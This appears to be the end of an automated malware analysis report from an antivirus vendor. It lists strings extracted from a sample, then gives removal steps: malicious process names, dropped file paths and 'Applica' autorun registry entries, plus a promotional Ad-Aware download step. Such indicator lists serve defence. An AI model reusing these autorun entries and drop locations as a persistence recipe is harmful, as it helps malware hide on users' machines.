File %s cannot be opened
''%s'' is not a valid ...
... (%d)
Too many entries in the list (%d)
List index exceeds the maximum (%d)
Memory stream cannot be expanded because memory is exhausted
Error reading %s%s%s: %s
%s.Seek not implemented
... for '%s' not found
%s cannot be assigned to %s
Class %s not found
%s (%s, line %d)
Abstract error
Access violation at address %p in module '%s'. %s of address %p
System error. Code: %d.
%s: a call to an operating system function failed
Invalid variant operation
Invalid variant operation ($%.8x)
Variant is not an array
Variant of type (%s) could not be converted to type (%s)
Overflow converting a variant of type (%s) to type (%s)
Invalid variant type
Operation not supported
External exception %x
Assertion failed
Invalid pointer operation
Invalid type cast
Access violation at address %p. %s of address %p
Privileged instruction
Exception %s in module %s at %p.
Application error
Format '%s' inv...
... for format '%s'
Variant method call not supported
'%s' is not a valid integer value
'%s' is not a valid ...
I/O error %d
Invalid floating-point operation
lash\Flash32_23_0_0_185.ocx


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    ns5590.tmp:2176
    %original file name%.exe:1900
    ddnow.exe:2996
    ddnow.exe:3060
    tinstall.exe:2692
    setupone.exe:3488

  2. Delete the original Dropped file.
  3. Delete or disinfect the following files created/modified by the Dropped:

    C:\Users\"%CurrentUserName%"\AppData\Local\uid.exe (12 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\tinstall.exe (15 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi53CB.tmp\SimpleFC.dll (5469 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi53CB.tmp\nsExec.dll (14 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\ddnow.exe (13 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\uid4.exe (9 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi53CB.tmp\ns5590.tmp (14 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\tinstall4.exe (7 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\ddnow4.exe (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\aatxtname.txt (10 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\setupone.exe (61 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\system.ini (16 bytes)
    %Program Files%\applica\applica.exe (12 bytes)
    %Program Files%\applica\key.ini (0 bytes)
    %Program Files%\applica\uninstall.exe (1030 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "Applica" = "%Program Files%\applica\applica.exe"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "Applica" = "%Program Files%\applica\applica.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
